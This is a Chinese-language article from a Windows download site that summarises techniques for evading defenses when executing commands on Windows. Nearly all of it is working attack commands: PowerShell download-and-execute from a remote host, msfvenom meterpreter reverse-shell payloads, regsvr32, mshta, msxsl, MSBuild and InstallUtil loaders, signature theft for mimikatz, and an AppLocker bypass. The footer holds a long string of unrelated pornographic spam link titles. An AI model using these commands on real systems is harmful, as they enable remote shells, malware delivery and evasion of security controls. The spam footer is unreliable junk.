系統(tǒng)家園 - 系統(tǒng)下載更安全,全網(wǎng)最新系統(tǒng)專題大全。
最新更新 系統(tǒng)重裝教程(一看就會(huì)視頻+圖文版)
當(dāng)前位置: 首頁 > 系統(tǒng)教程 > win11教程

Windows命令執(zhí)行防御規(guī)避總結(jié)

更新日期:2023-09-22 10:16:06

來源:系統(tǒng)之家

手機(jī)掃碼繼續(xù)觀看
Windows命令執(zhí)行防御規(guī)避總結(jié)

  今天小編為大家?guī)鞼indows命令執(zhí)行防御規(guī)避總結(jié),具體如下:

Windows命令執(zhí)行防御規(guī)避總結(jié)

  powershell

  powershell.exe -nop -w hidden -c \“IEX ((new-object net.webclient).downloadstring(‘https://xx.xx.xx.xx:8888/logo.gif’))\”“ /f

  SIP

  通過sip劫持對(duì)惡意代碼簽名獲得系統(tǒng)信任https://github.com/secretsquirrel/SigThief

  python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

  rundll32.exe

  生成

  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

  目標(biāo)執(zhí)行

  rundll32.exe shell32.dll,Control_RunDLL xxx.dll

  Regsvr32.exe

  msfconsole

  auxiliary/server/regsvr32_command_delivery_server

  set CMD net user test 123456 /add

  目標(biāo)執(zhí)行

  regsvr32 /s /n /u /i:https://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

  InstallUtil.exe

  1.編譯后門:

  C:\Windows\Microsoft.NET\Framework64\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk“ xxx.cs

  2.靶機(jī)上運(yùn)行:

  InstallUtil.exe /U xxx.exe

  3.msf監(jiān)聽,得到反彈的shell:

  set payload windows/x64/meterpreter/reverse_tcp

  set LHOST xx.xx.xx.xx

  set LPORT 4444

  exploit

  Msbuild.exe

  MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺(tái),MSBuild可編譯特定格式的xml文件

  https://github.com/3gstudent/msbuild-inline-task

  msf生成shellcode

  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

  -f csharp

  使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

  msf監(jiān)聽

  use exploit/multi/handler

  set payload windows/x64/meterpreter/reverse_tcp

  set lhost xx.xx.xx.xx

  set lport 4444

  exploit

  運(yùn)行

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml

  CMSTP

  cmstp.exe /s /ns C:\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt繞過AppLocker并啟動(dòng)惡意腳本

  Mshta.exe

  Mshta.exe 是一個(gè)執(zhí)行 Microsoft HTML 應(yīng)用程序 (HTA) 的實(shí)用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實(shí)用程序代理執(zhí)行惡意代碼

  use exploit/windows/misc/hta_server

  msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

  msf exploit(windows/misc/hta_server) 》 exploit

  mshta.exe https://xx.xx.xx.xx:8080/xxxxxxx.hta

  控制面板

  攻擊者可以使用控制面板項(xiàng)作為有效載荷來執(zhí)行任意命令,控制面板項(xiàng)是注冊(cè)的可執(zhí)行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執(zhí)行或通過Control_RunDLL(API)調(diào)用或者直接雙擊文件。

  攻擊者構(gòu)造惡意的dll文件CPIApplet.dll

  利用msf生成dll文件

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

  傳入windows機(jī)器,然后重命名為CPIApplet.cpl,通過control.exe c:\users\administrator\desktop\CPIApplet.cpl 執(zhí)行命令

  通過msxsl.exe調(diào)用惡意xml文件執(zhí)行腳本

  制作兩個(gè)文件

  customers.xml

  script.xsl

  xmlns:xsl=”https://www.w3.org/1999/XSL/Transform“

  xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

  xmlns:user=”https://mycompany.com/mynamespace“》

  function xml(nodelist) {

  var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

  return nodelist.nextNode().xml;

  }

  開啟http服務(wù)

  python3 -m http.server 80

  遠(yuǎn)程下載執(zhí)行

  msxsl.exe https://xx.xx.xx.xx/customers.xml https://xx.xx.xx.xx/scrip.xsl

該文章是否有幫助到您?
Windows 10 系統(tǒng)在線下載
Windows 10 是迄今為止最好的 Windows|前往下載,成就你的非凡
立即下載 視頻教程:如何安裝該系統(tǒng)?
常見問題
系統(tǒng)下載排行

其他人正在下載 更多
安卓下載 更多
手機(jī)上觀看
掃碼手機(jī)上觀看
主站蜘蛛池模板: 国产精品成人网| 日本边摸边吃奶边做很爽视频| 午夜毛片在线观看| 高清一本之道加勒比在线| 男女一边桶一边摸一边脱视频免费| 国产精品vⅰdeoXXXX国产| 99热这里只有精品66| 性色AV无码中文AV有码VR| 久久精品7亚洲午夜a| 1024人成网站色| 毛片亚洲AV无码精品国产午夜| 老鸭窝毛片一区二区三区| 国产女同在线观看| 两个人看的视频播放www| 国内一区亚洲综合图区欧美| tube6xxxxxhd丶中国| 成人区人妻精品一区二区不卡| 久久亚洲精品无码gv| 日韩美aaa特级毛片| 亚洲午夜国产精品无卡| 97精品国产91久久久久久久| 小帅男同志chinesecouple| 亚洲av日韩综合一区二区三区 | 女人张开腿让男人桶免费网站| 中文字日本乱码| 日本动漫黄观看免费网站| 久久精品国产网红主播| 最近中文字幕2018| 亚洲丁香婷婷综合久久| 欧美影院在线观看| 亚洲最大看欧美片网站| 欧美重口另类在线播放二区| 亚洲视频在线免费播放| 狠狠色噜噜狠狠狠狠av| 免费一级e一片在线播放| 精品久久久久久中文字幕一区 | 手机国产乱子伦精品视频| 久久久久亚洲AV无码麻豆| 日本激情一区二区三区| 久久天天躁狠狠躁夜夜躁2014| 日韩国产欧美在线观看一区二区|